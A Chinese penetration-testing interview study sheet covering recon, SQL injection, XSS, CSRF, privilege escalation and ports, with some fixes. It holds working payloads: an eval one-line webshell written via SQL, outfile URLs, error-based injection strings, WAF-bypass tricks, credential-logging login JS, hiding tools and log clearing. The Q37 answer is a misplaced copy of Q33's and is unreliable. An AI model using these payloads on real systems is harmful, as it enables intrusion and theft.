思路流程

信息收集

服務(wù)器的相關(guān)信息（真實(shí)ip，系統(tǒng)類型，版本，開放端口，WAF等）

網(wǎng)站指紋識別（包括，cms，cdn，證書等），dns記錄

whois信息，姓名，備案，郵箱，電話反查（郵箱丟社工庫，社工準(zhǔn)備等）

子域名收集，旁站，C段等

google hacking針對化搜索，pdf文件，中間件版本，弱口令掃描等

掃描網(wǎng)站目錄結(jié)構(gòu)，爆后臺，網(wǎng)站banner，測試文件，備份等敏感文件泄漏等

傳輸協(xié)議，通用漏洞，exp，github源碼等

漏洞挖掘

瀏覽網(wǎng)站，看看網(wǎng)站規(guī)模，功能，特點(diǎn)等

端口，弱口令，目錄等掃描,對響應(yīng)的端口進(jìn)行漏洞探測，比如 rsync,心臟出血，mysql,ftp,ssh弱口令等。

XSS，SQL注入，上傳，命令注入，CSRF，cookie安全檢測，敏感信息，通信數(shù)據(jù)傳輸，暴力破解，任意文件上傳，越權(quán)訪問，未授權(quán)訪問，目錄遍歷，文件 包含，重放攻擊（短信轟炸），服務(wù)器漏洞檢測，最后使用漏掃工具等

漏洞利用&權(quán)限提升

• mysql提權(quán)，serv-u提權(quán)，oracle提權(quán)
• windows 溢出提權(quán)
• linux臟牛,內(nèi)核漏洞提權(quán)e

清除測試數(shù)據(jù)&輸出報(bào)告

日志、測試數(shù)據(jù)的清理 總結(jié)，輸出滲透測試報(bào)告，附修復(fù)方案

復(fù)測

驗(yàn)證并發(fā)現(xiàn)是否有新漏洞，輸出報(bào)告，歸檔

問題

1.拿到一個(gè)待檢測的站，你覺得應(yīng)該先做什么？

a、信息收集 1、獲取域名的whois信息,獲取注冊者郵箱姓名電話等，丟社工庫里看看有沒有泄露密碼，然后嘗試用泄露的密碼進(jìn)行登錄后臺。用郵箱做關(guān)鍵詞進(jìn)行丟進(jìn)搜索引擎。利用搜索到的關(guān)聯(lián)信息找出其他郵箱進(jìn)而得到常用社交賬號。社工找出社交賬號，里面或許會找出管理員設(shè)置密碼的習(xí)慣 。利用已有信息生成專用字典。 2、查詢服務(wù)器旁站以及子域名站點(diǎn)，因?yàn)橹髡疽话惚容^難，所以先看看旁站有沒有通用性的cms或者其他漏洞。 3、查看服務(wù)器操作系統(tǒng)版本，web中間件，看看是否存在已知的漏洞，比如IIS，APACHE,NGINX的解析漏洞 4、查看IP，進(jìn)行IP地址端口掃描，對響應(yīng)的端口進(jìn)行漏洞探測，比如 rsync,心臟出血，mysql,ftp,ssh弱口令等。 5、掃描網(wǎng)站目錄結(jié)構(gòu)，看看是否可以遍歷目錄，或者敏感文件泄漏，比如php探針 6、google hack 進(jìn)一步探測網(wǎng)站的信息，后臺，敏感文件

b、漏洞掃描 開始檢測漏洞，如XSS,XSRF,sql注入，代碼執(zhí)行，命令執(zhí)行，越權(quán)訪問，目錄讀取，任意文件讀取，下載，文件包含，遠(yuǎn)程命令執(zhí)行，弱口令，上傳，編輯器漏洞，暴力破解等

c、漏洞利用 利用以上的方式拿到webshell，或者其他權(quán)限

d、權(quán)限提升 提權(quán)服務(wù)器，比如windows下mysql的udf提權(quán)，serv-u提權(quán)，windows低版本的漏洞，如iis6,pr,巴西烤肉，linux臟牛漏洞，linux內(nèi)核版本漏洞提權(quán)，linux下的mysql system提權(quán)以及oracle低權(quán)限提權(quán)

e、日志清理

f、總結(jié)報(bào)告及修復(fù)方案

2.判斷出網(wǎng)站的CMS對滲透有什么意義？

查找網(wǎng)上已曝光的程序漏洞。

如果開源，還能下載相對應(yīng)的源碼進(jìn)行代碼審計(jì)。

3.一個(gè)成熟并且相對安全的CMS，滲透時(shí)掃目錄的意義？

敏感文件、二級目錄掃描

站長的誤操作比如：網(wǎng)站備份的壓縮文件、說明.txt、二級目錄可能存放著其他站點(diǎn)

4.常見的網(wǎng)站服務(wù)器容器。

IIS、Apache、nginx、Lighttpd、Tomcat

5.mysql注入點(diǎn)，用工具對目標(biāo)站直接寫入一句話，需要哪些條件？

root權(quán)限以及網(wǎng)站的絕對路徑。

6.目前已知哪些版本的容器有解析漏洞，具體舉例。

a、IIS 6.0 /xx.asp/xx.jpg "xx.asp"是文件夾名

b、IIS 7.0/7.5 默認(rèn)Fast-CGI開啟，直接在url中圖片地址后面輸入/1.php，會把正常圖片當(dāng)成php解析

c、Nginx 版本小于等于0.8.37，利用方法和IIS 7.0/7.5一樣，Fast-CGI關(guān)閉情況下也可利用。空字節(jié)代碼 xxx.jpg.php

d、Apache 上傳的文件命名為：test.php.x1.x2.x3，Apache是從右往左判斷后綴

e、lighttpd xx.jpg/xx.php，不全,請小伙伴們在評論處不吝補(bǔ)充，謝謝！

7.如何手工快速判斷目標(biāo)站是windows還是linux服務(wù)器？

linux大小寫敏感,windows大小寫不敏感。

8.為何一個(gè)mysql數(shù)據(jù)庫的站，只有一個(gè)80端口開放？

更改了端口，沒有掃描出來。

站庫分離。

3306端口不對外開放

9、3389無法連接的幾種情況

沒開放3389 端口 端口被修改 防護(hù)攔截 處于內(nèi)網(wǎng)(需進(jìn)行端口轉(zhuǎn)發(fā))

10.如何突破注入時(shí)字符被轉(zhuǎn)義？

寬字符注入 hex編碼繞過

11.在某后臺新聞編輯界面看到編輯器，應(yīng)該先做什么？

查看編輯器的名稱版本,然后搜索公開的漏洞。

12.拿到一個(gè)webshell發(fā)現(xiàn)網(wǎng)站根目錄下有.htaccess文件，我們能做什么？

能做的事情很多，用隱藏網(wǎng)馬來舉例子： 插入 <FilesMatch "xxx.jpg"> SetHandler application/x-httpd-php .jpg文件會被解析成.php文件。

具體其他的事情，不好詳說，建議大家自己去搜索語句來玩玩。

13.注入漏洞只能查賬號密碼？

只要權(quán)限廣，拖庫脫到老。

14.安全狗會追蹤變量，從而發(fā)現(xiàn)出是一句話木馬嗎？

是根據(jù)特征碼，所以很好繞過了，只要思路寬，繞狗繞到歡，但這應(yīng)該不會是一成不變的。

**15.access 掃出后綴為asp的數(shù)據(jù)庫文件，訪問亂碼，**如何實(shí)現(xiàn)到本地利用？

迅雷下載，直接改后綴為.mdb。

16.提權(quán)時(shí)選擇可讀寫目錄，為何盡量不用帶空格的目錄？

因?yàn)閑xp執(zhí)行多半需要空格界定參數(shù)

17.某服務(wù)器有站點(diǎn)A,B 為何在A的后臺添加test用戶，訪問B的后臺。發(fā)現(xiàn)也添加上了test用戶？

同數(shù)據(jù)庫。

18.注入時(shí)可以不使用and 或or 或xor，直接order by 開始注入嗎？

and/or/xor，前面的1=1、1=2步驟只是為了判斷是否為注入點(diǎn)，如果已經(jīng)確定是注入點(diǎn)那就可以省那步驟去。

19:某個(gè)防注入系統(tǒng)，在注入時(shí)會提示：

系統(tǒng)檢測到你有非法注入的行為。 已記錄您的ip xx.xx.xx.xx 時(shí)間:2016:01-23 提交頁面:test.asp?id=15 提交內(nèi)容:and 1=1

20、如何利用這個(gè)防注入系統(tǒng)拿shell？

在URL里面直接提交一句話，這樣網(wǎng)站就把你的一句話也記錄進(jìn)數(shù)據(jù)庫文件了 這個(gè)時(shí)候可以嘗試尋找網(wǎng)站的配置文件 直接上菜刀鏈接。

21.上傳大馬后訪問亂碼時(shí)，有哪些解決辦法？

瀏覽器中改編碼。

22.審查上傳點(diǎn)的元素有什么意義？

有些站點(diǎn)的上傳文件類型的限制是在前端實(shí)現(xiàn)的，這時(shí)只要增加上傳類型就能突破限制了。

23.目標(biāo)站禁止注冊用戶，找回密碼處隨便輸入用戶名提示：“此用戶不存在”，你覺得這里怎樣利用？

先爆破用戶名，再利用被爆破出來的用戶名爆破密碼。 其實(shí)有些站點(diǎn)，在登陸處也會這樣提示 所有和數(shù)據(jù)庫有交互的地方都有可能有注入。

24.目標(biāo)站發(fā)現(xiàn)某txt的下載地址為 http://www.test.com/down/down.php?file=/upwdown/1.txt，你有什么思路？

這就是傳說中的下載漏洞！在file=后面嘗試輸入index.php下載他的首頁文件，然后在首頁文件里繼續(xù)查找其他網(wǎng)站的配置文件，可以找出網(wǎng)站的數(shù)據(jù)庫密碼和數(shù)據(jù)庫的地址。

25.甲給你一個(gè)目標(biāo)站，并且告訴你根目錄下存在/abc/目錄，并且此目錄下存在編輯器和admin目錄。請問你的想法是？

直接在網(wǎng)站二級目錄/abc/下掃描敏感文件及目錄。

26.在有shell的情況下，如何使用xss實(shí)現(xiàn)對目標(biāo)站的長久控制？

后臺登錄處加一段記錄登錄賬號密碼的js，并且判斷是否登錄成功，如果登錄成功，就把賬號密碼記錄到一個(gè)生僻的路徑的文件中或者直接發(fā)到自己的網(wǎng)站文件中。(此方法適合有價(jià)值并且需要深入控制權(quán)限的網(wǎng)絡(luò))。

在登錄后才可以訪問的文件中插入XSS腳本。

27.后臺修改管理員密碼處，原密碼顯示為*。你覺得該怎樣實(shí)現(xiàn)讀出這個(gè)用戶的密碼？

審查元素 把密碼處的password屬性改成text就明文顯示了

28.目標(biāo)站無防護(hù)，上傳圖片可以正常訪問，上傳腳本格式訪問則403.什么原因？

原因很多，有可能web服務(wù)器配置把上傳目錄寫死了不執(zhí)行相應(yīng)腳本，嘗試改后綴名繞過

29.審查元素得知網(wǎng)站所使用的防護(hù)軟件，你覺得怎樣做到的？

在敏感操作被攔截，通過界面信息無法具體判斷是什么防護(hù)的時(shí)候，F12看HTML體部 比如護(hù)衛(wèi)神就可以在名稱那看到內(nèi)容。

30.在win2003服務(wù)器中建立一個(gè) .zhongzi文件夾用意何為？

隱藏文件夾，為了不讓管理員發(fā)現(xiàn)你傳上去的工具。

31、sql注入有以下兩個(gè)測試選項(xiàng)，選一個(gè)并且闡述不選另一個(gè)的理由：

A. demo.jsp?id=2+1 B. demo.jsp?id=2-1 選B，在 URL 編碼中 + 代表空格，可能會造成混淆

32、以下鏈接存在 sql 注入漏洞，對于這個(gè)變形注入，你有什么思路？

demo.do?DATA=AjAxNg== DATA有可能經(jīng)過了 base64 編碼再傳入服務(wù)器，所以我們也要對參數(shù)進(jìn)行 base64 編碼才能正確完成測試

33、發(fā)現(xiàn) demo.jsp?uid=110 注入點(diǎn)，你有哪幾種思路獲取 webshell，哪種是優(yōu)選？

有寫入權(quán)限的，構(gòu)造聯(lián)合查詢語句使用using INTO OUTFILE，可以將查詢的輸出重定向到系統(tǒng)的文件中，這樣去寫入 WebShell 使用 sqlmap –os-shell 原理和上面一種相同，來直接獲得一個(gè) Shell，這樣效率更高 通過構(gòu)造聯(lián)合查詢語句得到網(wǎng)站管理員的賬戶和密碼，然后掃后臺登錄后臺，再在后臺通過改包上傳等方法上傳 Shell

34、CSRF 和 XSS 和 XXE 有什么區(qū)別，以及修復(fù)方式？

XSS是跨站腳本攻擊，用戶提交的數(shù)據(jù)中可以構(gòu)造代碼來執(zhí)行，從而實(shí)現(xiàn)竊取用戶信息等攻擊。修復(fù)方式：對字符實(shí)體進(jìn)行轉(zhuǎn)義、使用HTTP Only來禁止JavaScript讀取Cookie值、輸入時(shí)校驗(yàn)、瀏覽器與Web應(yīng)用端采用相同的字符編碼。

CSRF是跨站請求偽造攻擊，XSS是實(shí)現(xiàn)CSRF的諸多手段中的一種，是由于沒有在關(guān)鍵操作執(zhí)行時(shí)進(jìn)行是否由用戶自愿發(fā)起的確認(rèn)。修復(fù)方式：篩選出需要防范CSRF的頁面然后嵌入Token、再次輸入密碼、檢驗(yàn)Referer XXE是XML外部實(shí)體注入攻擊，XML中可以通過調(diào)用實(shí)體來請求本地或者遠(yuǎn)程內(nèi)容，和遠(yuǎn)程文件保護(hù)類似，會引發(fā)相關(guān)安全問題，例如敏感文件讀取。修復(fù)方式：XML解析庫在調(diào)用時(shí)嚴(yán)格禁止對外部實(shí)體的解析。

35、CSRF、SSRF和重放攻擊有什么區(qū)別？

CSRF是跨站請求偽造攻擊，由客戶端發(fā)起 SSRF是服務(wù)器端請求偽造，由服務(wù)器發(fā)起 重放攻擊是將截獲的數(shù)據(jù)包進(jìn)行重放，達(dá)到身份認(rèn)證等目的

36、說出至少三種業(yè)務(wù)邏輯漏洞，以及修復(fù)方式？

密碼找回漏洞中存在

1）密碼允許暴力破解、

2）存在通用型找回憑證、

3）可以跳過驗(yàn)證步驟、

4）找回憑證可以攔包獲取

等方式來通過廠商提供的密碼找回功能來得到密碼。身份認(rèn)證漏洞中最常見的是

1）會話固定攻擊

2） Cookie 仿冒

只要得到 Session 或 Cookie 即可偽造用戶身份。驗(yàn)證碼漏洞中存在

1）驗(yàn)證碼允許暴力破解

2）驗(yàn)證碼可以通過 Javascript 或者改包的方法來進(jìn)行繞過

37、圈出下面會話中可能存在問題的項(xiàng)，并標(biāo)注可能會存在的問題？

get /ecskins/demo.jsp?uid=2016031900&keyword=”hello world” HTTP/1.1Host:***.com:82User-Agent:Mozilla/ 5.0 Firefox/40Accept:text/css,/;q=0.1 Accept-Language:zh-CN;zh;q=0.8;en-US;q=0.5,en;q=0.3 Referer:http://*******.com/eciop/orderForCC/ cgtListForCC.htm?zone=11370601&v=145902 Cookie:myguid1234567890=1349db5fe50c372c3d995709f54c273d; uniqueserid=session_OGRMIFIYJHAH5_HZRQOZAMHJ; st_uid=N90PLYHLZGJXI-NX01VPUF46W; status=True Connection:keep-alive

有寫入權(quán)限的，構(gòu)造聯(lián)合查詢語句使用using INTO OUTFILE，可以將查詢的輸出重定向到系統(tǒng)的文件中，這樣去寫入 WebShell 使用 sqlmap –os-shell 原理和上面一種相同，來直接獲得一個(gè) Shell，這樣效率更高 通過構(gòu)造聯(lián)合查詢語句得到網(wǎng)站管理員的賬戶和密碼，然后掃后臺登錄后臺，再在后臺通過改包上傳等方法上傳 Shell

38、給你一個(gè)網(wǎng)站你是如何來滲透測試的?在獲取書面授權(quán)的前提下。

39、sqlmap，怎么對一個(gè)注入點(diǎn)注入？ 1）如果是get型號，直接，sqlmap -u "諸如點(diǎn)網(wǎng)址". 2) 如果是post型諸如點(diǎn)，可以sqlmap -u "注入點(diǎn)網(wǎng)址” --data="post的參數(shù)" 3）如果是cookie，X-Forwarded-For等，可以訪問的時(shí)候，用burpsuite抓包，注入處用號替換，放到文件里，然后sqlmap -r "文件地址"

40、nmap，掃描的幾種方式

41、sql注入的幾種類型？ 1）報(bào)錯(cuò)注入 2）bool型注入 3）延時(shí)注入 4）寬字節(jié)注入 42、報(bào)錯(cuò)注入的函數(shù)有哪些？10個(gè)

1）and extractvalue(1, concat(0x7e,(select @@version),0x7e))】】】 2）通過floor報(bào)錯(cuò) 向下取整 3）+and updatexml(1, concat(0x7e,(secect @@version),0x7e),1) 4）.geometrycollection()select from test where id=1 and geometrycollection((select from(selectfrom(select user())a)b)); 5）.multipoint()select from test where id=1 and multipoint((select from(select from(select user())a)b)); 6）.polygon()select from test where id=1 and polygon((select from(select from(select user())a)b)); 7）.multipolygon()select from test where id=1 and multipolygon((select from(select from(select user())a)b)); 8）.linestring()select from test where id=1 and linestring((select from(select from(select user())a)b)); 9）.multilinestring()select from test where id=1 and multilinestring((select from(select from(select user())a)b)); 10）.exp()select from test where id=1 and exp(~(select * from(select user())a));

43、延時(shí)注入如何來判斷？

if(ascii(substr(“hello”, 1, 1))=104, sleep(5), 1)

44、盲注和延時(shí)注入的共同點(diǎn)？都是一個(gè)字符一個(gè)字符的判斷

45、如何拿一個(gè)網(wǎng)站的webshell？上傳，后臺編輯模板，sql注入寫文件，命令執(zhí)行，代碼執(zhí)行， 一些已經(jīng)爆出的cms漏洞，比如dedecms后臺可以直接建立腳本文件，wordpress上傳插件包含腳本文件zip壓縮包等

46、sql注入寫文件都有哪些函數(shù)？

select '一句話' into outfile '路徑' select '一句話' into dumpfile '路徑' select '<?php eval($_POST[1]) ?>' into dumpfile 'd:\wwwroot\baidu.com\nvhack.php';

47、如何防止CSRF? 1,驗(yàn)證referer 2，驗(yàn)證token 詳細(xì)：http://cnodejs.org/topic/5533dd6e9138f09b629674fd

48、owasp 漏洞都有哪些？ 1、SQL注入防護(hù)方法： 2、失效的身份認(rèn)證和會話管理 3、跨站腳本攻擊XSS 4、直接引用不安全的對象 5、安全配置錯(cuò)誤 6、敏感信息泄露 7、缺少功能級的訪問控制 8、跨站請求偽造CSRF 9、使用含有已知漏洞的組件 10、未驗(yàn)證的重定向和轉(zhuǎn)發(fā)

49、SQL注入防護(hù)方法？ 1、使用安全的API 2、對輸入的特殊字符進(jìn)行Escape轉(zhuǎn)義處理 3、使用白名單來規(guī)范化輸入驗(yàn)證方法 4、對客戶端輸入進(jìn)行控制，不允許輸入SQL注入相關(guān)的特殊字符 5、服務(wù)器端在提交數(shù)據(jù)庫進(jìn)行SQL查詢之前，對特殊字符進(jìn)行過濾、轉(zhuǎn)義、替換、刪除。

50、代碼執(zhí)行，文件讀取，命令執(zhí)行的函數(shù)都有哪些？

1）代碼執(zhí)行：eval,preg_replace+/e,assert,call_user_func,call_user_func_array,create_function2）文件讀取：file_get_contents(),highlight_file(),fopen(),read file(),fread(),fgetss(), fgets(),parse_ini_file(),show_source(),file()等 3)命令執(zhí)行：system(), exec(), shell_exec(), passthru() ,pcntl_exec(), popen(),proc_open()

51、img標(biāo)簽除了onerror屬性外，還有其他獲取管理員路徑的辦法嗎？ src指定一個(gè)遠(yuǎn)程的腳本文件，獲取referer

52、img標(biāo)簽除了onerror屬性外，并且src屬性的后綴名，必須以.jpg結(jié)尾，怎么獲取管理員路徑。

1）遠(yuǎn)程服務(wù)器修改apache配置文件，配置.jpg文件以php方式來解析 AddType application/x-httpd-php .jpg <img src=http://xss.tv/1.jpg> 會以php方式來解析

53、為什么aspx木馬權(quán)限比asp大？

aspx使用的是.net技術(shù)。IIS 中默認(rèn)不支持，ASP只是腳本語言而已。入侵的時(shí)候asp的木馬一般是guest權(quán)限…APSX的木馬一般是users權(quán)限。

54、如何繞過waf？

大小寫轉(zhuǎn)換法 干擾字符 /*!*/ 編碼 base64 unicode hex url ascll 復(fù)參數(shù)

55、如何向服務(wù)器寫入webshell？

各種上傳漏洞 mysql具有寫入權(quán)限,用sql語句寫入shell http put方法

56、滲透測試中常見的端口

a、web類(web漏洞/敏感目錄) 第三方通用組件漏洞struts thinkphp jboss ganglia zabbix

80 web 80-89 web 8000-9090 web

b、數(shù)據(jù)庫類(掃描弱口令)

1433 MSSQL 1521 Oracle 3306 MySQL 5432 PostgreSQL

c、特殊服務(wù)類(未授權(quán)/命令執(zhí)行類/漏洞)

443 SSL心臟滴血 873 Rsync未授權(quán) 5984 CouchDB http://xxx:5984/_utils/ 6379 redis未授權(quán) 7001,7002 WebLogic默認(rèn)弱口令，反序列 9200,9300 elasticsearch 參考WooYun: 多玩某服務(wù)器ElasticSearch命令執(zhí)行漏洞 11211 memcache未授權(quán)訪問 27017,27018 Mongodb未授權(quán)訪問 50000 SAP命令執(zhí)行 50070,50030 hadoop默認(rèn)端口未授權(quán)訪問

d、常用端口類(掃描弱口令/端口爆破)

21 ftp 22 SSH 23 Telnet 2601,2604 zebra路由，默認(rèn)密碼zebra 3389 遠(yuǎn)程桌面

ALL、端口合計(jì)詳情

21 ftp 22 SSH 23 Telnet 80 web 80-89 web 161 SNMP 389 LDAP 443 SSL心臟滴血以及一些web漏洞測試 445 SMB 512,513,514 Rexec 873 Rsync未授權(quán) 1025,111 NFS 1433 MSSQL 1521 Oracle:(iSqlPlus Port:5560,7778) 2082/2083 cpanel主機(jī)管理系統(tǒng)登陸 （國外用較多） 2222 DA虛擬主機(jī)管理系統(tǒng)登陸 （國外用較多） 2601,2604 zebra路由，默認(rèn)密碼zebra 3128 squid代理默認(rèn)端口，如果沒設(shè)置口令很可能就直接漫游內(nèi)網(wǎng)了 3306 MySQL 3312/3311 kangle主機(jī)管理系統(tǒng)登陸 3389 遠(yuǎn)程桌面 4440 rundeck 參考WooYun: 借用新浪某服務(wù)成功漫游新浪內(nèi)網(wǎng) 5432 PostgreSQL 5900 vnc 5984 CouchDB http://xxx:5984/_utils/ 6082 varnish 參考WooYun: Varnish HTTP accelerator CLI 未授權(quán)訪問易導(dǎo)致網(wǎng)站被直接篡改或者作為代理進(jìn)入內(nèi)網(wǎng) 6379 redis未授權(quán) 7001,7002 WebLogic默認(rèn)弱口令，反序列 7778 Kloxo主機(jī)控制面板登錄 8000-9090 都是一些常見的web端口，有些運(yùn)維喜歡把管理后臺開在這些非80的端口上 8080 tomcat/WDCP主機(jī)管理系統(tǒng)，默認(rèn)弱口令 8080,8089,9090 JBOSS 8083 Vestacp主機(jī)管理系統(tǒng) （國外用較多） 8649 ganglia 8888 amh/LuManager 主機(jī)管理系統(tǒng)默認(rèn)端口 9200,9300 elasticsearch 參考WooYun: 多玩某服務(wù)器ElasticSearch命令執(zhí)行漏洞 10000 Virtualmin/Webmin 服務(wù)器虛擬主機(jī)管理系統(tǒng) 11211 memcache未授權(quán)訪問 27017,27018 Mongodb未授權(quán)訪問 28017 mongodb統(tǒng)計(jì)頁面 50000 SAP命令執(zhí)行 50070,50030 hadoop默認(rèn)端口未授權(quán)訪問

深信服一面:

• 了解哪些漏洞
• 文件上傳有哪些防護(hù)方式
• 用什么掃描端口，目錄
• 如何判斷注入
• 注入有防護(hù)怎么辦
• 有沒有寫過tamper
• 3306 1443 8080是什么端口
• 計(jì)算機(jī)網(wǎng)絡(luò)從物理層到應(yīng)用層xxxx
• 有沒有web服務(wù)開發(fā)經(jīng)驗(yàn)
• 如何向服務(wù)器寫入webshell
• 有沒有用過xss平臺
• 網(wǎng)站滲透的流程
• mysql兩種提權(quán)方式（udf，？）
• 常見加密方式xxx
• ddos如何防護(hù)
• 有沒有抓過包，會不會寫wireshark過濾規(guī)則
• 清理日志要清理哪些

SQL注入防護(hù)

1、使用安全的API 2、對輸入的特殊字符進(jìn)行Escape轉(zhuǎn)義處理 3、使用白名單來規(guī)范化輸入驗(yàn)證方法 4、對客戶端輸入進(jìn)行控制，不允許輸入SQL注入相關(guān)的特殊字符 5、服務(wù)器端在提交數(shù)據(jù)庫進(jìn)行SQL查詢之前，對特殊字符進(jìn)行過濾、轉(zhuǎn)義、替換、刪除。 6、規(guī)范編碼,字符集

為什么參數(shù)化查詢可以防止sql注入

原理:

使用參數(shù)化查詢數(shù)據(jù)庫服務(wù)器不會把參數(shù)的內(nèi)容當(dāng)作sql指令的一部分來執(zhí)行，是在數(shù)據(jù)庫完成sql指令的編譯后才套用參數(shù)運(yùn)行

簡單的說: 參數(shù)化能防注入的原因在于,語句是語句，參數(shù)是參數(shù)，參數(shù)的值并不是語句的一部分，數(shù)據(jù)庫只按語句的語義跑

SQL頭注入點(diǎn)

UA REFERER COOKIE IP

盲注是什么？怎么盲注？

盲注是在SQL注入攻擊過程中，服務(wù)器關(guān)閉了錯(cuò)誤回顯，我們單純通過服務(wù)器返回內(nèi)容的變化來判斷是否存在SQL注入和利用的方式。盲注的手段有兩種，一個(gè)是通過頁面的返回內(nèi)容是否正確(boolean-based)，來驗(yàn)證是否存在注入。一個(gè)是通過sql語句處理時(shí)間的不同來判斷是否存在注入(time-based)，在這里，可以用benchmark，sleep等造成延時(shí)效果的函數(shù)，也可以通過構(gòu)造大笛卡兒積的聯(lián)合查詢表來達(dá)到延時(shí)的目的。

寬字節(jié)注入產(chǎn)生原理以及根本原因

產(chǎn)生原理

在數(shù)據(jù)庫使用了寬字符集而WEB中沒考慮這個(gè)問題的情況下，在WEB層，由于0XBF27是兩個(gè)字符，在PHP中比如addslash和magic_quotes_gpc開啟時(shí)，由于會對0x27單引號進(jìn)行轉(zhuǎn)義，因此0xbf27會變成0xbf5c27,而數(shù)據(jù)進(jìn)入數(shù)據(jù)庫中時(shí)，由于0XBF5C是一個(gè)另外的字符，因此\轉(zhuǎn)義符號會被前面的bf帶著"吃掉"，單引號由此逃逸出來可以用來閉合語句。

在哪里編碼

根本原因

character_set_client(客戶端的字符集)和character_set_connection(連接層的字符集)不同,或轉(zhuǎn)換函數(shù)如，iconv、mb_convert_encoding使用不當(dāng)。

解決辦法

統(tǒng)一數(shù)據(jù)庫、Web應(yīng)用、操作系統(tǒng)所使用的字符集，避免解析產(chǎn)生差異，最好都設(shè)置為UTF-8。或?qū)?shù)據(jù)進(jìn)行正確的轉(zhuǎn)義，如mysql_real_escape_string+mysql_set_charset的使用。

sql里面只有update怎么利用

先理解這句 SQL

UPDATE user SET password='MD5($password)', homepage='$homepage' WHERE id='$id'

如果此 SQL 被修改成以下形式，就實(shí)現(xiàn)了注入

a、修改 homepage 值為http://xxx.net', userlevel='3

之后 SQL 語句變?yōu)?/p> UPDATE user SET password='mypass', homepage='http://xxx.net', userlevel='3' WHERE id='$id'

userlevel 為用戶級別

b、修改 password 值為mypass)' WHERE username='admin'#

之后 SQL 語句變?yōu)?/p> UPDATE user SET password='MD5(mypass)' WHERE username='admin'#)', homepage='$homepage' WHERE id='$id'

c、修改 id 值為' OR username='admin'之后 SQL 語句變?yōu)?/p> UPDATE user SET password='MD5($password)', homepage='$homepage' WHERE id='' OR username='admin'

sql如何寫shell/單引號被過濾怎么辦

寫shell: root權(quán)限，GPC關(guān)閉，知道文件路徑 outfile函數(shù)

`http://127.0.0.1:81/sqli.php?id=1 into outfile 'C:\\wamp64\\www\\phpinfo.php' FIELDS TERMINATED BY '<?php phpinfo(); ?>'``http://127.0.0.1:81/sqli.php?id=-1 union select 1,0x3c3f70687020706870696e666f28293b203f3e,3,4 into outfile 'C:\\wamp64\\www\\phpinfo.php'`

寬字節(jié)注入

代替空格的方法

%0a、%0b、%a0 等 /**/ 等注釋符 <>

mysql的網(wǎng)站注入，5.0以上和5.0以下有什么區(qū)別？

5.0以下沒有information_schema這個(gè)系統(tǒng)表，無法列表名等，只能暴力跑表名。

5.0以下是多用戶單操作，5.0以上是多用戶多操做。

XSS

XSS原理

反射型

用戶提交的數(shù)據(jù)中可以構(gòu)造代碼來執(zhí)行，從而實(shí)現(xiàn)竊取用戶信息等攻擊。需要誘使用戶“點(diǎn)擊”一個(gè)惡意鏈接，才能攻擊成功

儲存型

存儲型XSS會把用戶輸入的數(shù)據(jù)“存儲”在服務(wù)器端。這種XSS具有很強(qiáng)的穩(wěn)定性。

DOM型

通過修改頁面的DOM節(jié)點(diǎn)形成的XSS，稱之為DOM Based XSS。

DOM型和反射型的區(qū)別

反射型XSS：通過誘導(dǎo)用戶點(diǎn)擊，我們構(gòu)造好的惡意payload才會觸發(fā)的XSS。反射型XSS的檢測我們在每次請求帶payload的鏈接時(shí)頁面應(yīng)該是會帶有特定的畸形數(shù)據(jù)的。DOM型：通過修改頁面的DOM節(jié)點(diǎn)形成的XSS。DOM-based XSS由于是通過js代碼進(jìn)行dom操作產(chǎn)生的XSS，所以在請求的響應(yīng)中我們甚至不一定會得到相應(yīng)的畸形數(shù)據(jù)。根本區(qū)別在我看來是輸出點(diǎn)的不同。

DOM型XSS 自動(dòng)化測試或人工測試

人工測試思路：找到類似document.write、innerHTML賦值、outterHTML賦值、window.location操作、寫javascript:后內(nèi)容、eval、setTimeout 、setInterval 等直接執(zhí)行之類的函數(shù)點(diǎn)。找到其變量，回溯變量來源觀察是否可控，是否經(jīng)過安全函數(shù)。自動(dòng)化測試參看道哥的博客，思路是從輸入入手，觀察變量傳遞的過程，最終檢查是否有在危險(xiǎn)函數(shù)輸出，中途是否有經(jīng)過安全函數(shù)。但是這樣就需要有一個(gè)javascript解析器，否則會漏掉一些通過js執(zhí)行帶入的部分內(nèi)容。

在回答這段問題的時(shí)候，由于平時(shí)對客戶的檢測中，基本是憑借不同功能點(diǎn)的功能加上經(jīng)驗(yàn)和直覺來進(jìn)行檢測，對不同類型的XSS檢測方式實(shí)際上并沒有太過細(xì)分的標(biāo)準(zhǔn)化檢測方式，所以回答的很爛。。。

對于XSS怎么修補(bǔ)建議

輸入點(diǎn)檢查：對用戶輸入的數(shù)據(jù)進(jìn)行合法性檢查，使用filter過濾敏感字符或?qū)M(jìn)行編碼轉(zhuǎn)義，針對特定類型數(shù)據(jù)進(jìn)行格式檢查。針對輸入點(diǎn)的檢查最好放在服務(wù)器端實(shí)現(xiàn)。

輸出點(diǎn)檢查：對變量輸出到HTML頁面中時(shí)，對輸出內(nèi)容進(jìn)行編碼轉(zhuǎn)義，輸出在HTML中時(shí)，對其進(jìn)行HTMLEncode，如果輸出在Javascript腳本中時(shí)，對其進(jìn)行JavascriptEncode。對使用JavascriptEncode的變量都放在引號中并轉(zhuǎn)義危險(xiǎn)字符，data部分就無法逃逸出引號外成為code的一部分。還可以使用更加嚴(yán)格的方法，對所有數(shù)字字母之外的字符都使用十六進(jìn)制編碼。此外，要注意在瀏覽器中，HTML的解析會優(yōu)先于Javascript的解析，編碼的方式也需要考慮清楚，針對不同的輸出點(diǎn)，我們防御XSS的方法可能會不同，這點(diǎn)可能在之后的文章會做下總結(jié)。

除此之外，還有做HTTPOnly對Cookie劫持做限制。

XSS蠕蟲的產(chǎn)生條件

正常情況下，一個(gè)是產(chǎn)生XSS點(diǎn)的頁面不屬于self頁面，用戶之間產(chǎn)生交互行為的頁面，都可能造成XSS Worm的產(chǎn)生。 不一定需要存儲型XSS

CSRF

CSRF原理

CSRF是跨站請求偽造攻擊，由客戶端發(fā)起,是由于沒有在關(guān)鍵操作執(zhí)行時(shí)進(jìn)行是否由用戶自愿發(fā)起的確認(rèn)

防御

驗(yàn)證Referer 添加token

token和referer做橫向?qū)Ρ?#xff0c;誰安全等級高？

token安全等級更高，因?yàn)椴⒉皇侨魏畏?wù)器都可以取得referer，如果從HTTPS跳到HTTP，也不會發(fā)送referer。并且FLASH一些版本中可以自定義referer。但是token的話，要保證其足夠隨機(jī)且不可泄露。(不可預(yù)測性原則)

對referer的驗(yàn)證，從什么角度去做？如果做，怎么杜絕問題

對header中的referer的驗(yàn)證，一個(gè)是空referer，一個(gè)是referer過濾或者檢測不完善。為了杜絕這種問題，在驗(yàn)證的白名單中，正則規(guī)則應(yīng)當(dāng)寫完善。

